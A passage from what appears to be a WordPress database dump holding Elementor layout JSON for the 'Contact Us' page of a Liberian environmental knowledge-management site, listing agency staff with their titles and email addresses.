tor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14852,2356,'_elementor_edit_mode','builder'),(14853,2356,'_elementor_template_type','wp-page'),(14854,2356,'_elementor_version','2.7.5'),(14855,2356,'_wp_page_template','default'),(14856,2356,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"deskt